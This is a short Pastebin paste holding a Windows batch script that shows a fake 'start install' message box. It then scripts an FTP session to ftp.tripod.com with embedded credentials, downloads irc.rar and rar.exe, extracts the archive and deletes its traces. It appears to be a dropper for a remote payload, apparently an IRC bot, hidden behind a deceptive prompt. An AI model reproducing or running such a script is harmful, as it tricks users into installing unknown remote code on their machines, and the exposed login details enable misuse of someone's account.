Guest User

Untitled

a guest
Jul 15th, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. mkdir irc
  2. cd irc
  3. echo msgbox"Click OK to start install. Don't close the box. When it is done it will close automatically.">a.vbs &;a.vbs
  4. del a.vbs
  5. echo open ftp.tripod.com>>a.txt
  6. echo applewill>>a.txt
  7. echo 123qwe>>a.txt
  8. echo prompt>>a.txt
  9. echo binary>>a.txt
  10. echo hash>>a.txt
  11. echo get irc.rar>>a.txt
  12. echo cd />>a.txt
  13. echo get rar.exe>>a.txt
  14. echo quit>>a.txt
  15. ftp -s:a.txt
  16. del a.txt
  17. rar x irc.rar
  18. del rar.exe
  19. del *.rar
Add Comment
Please, Sign In to add comment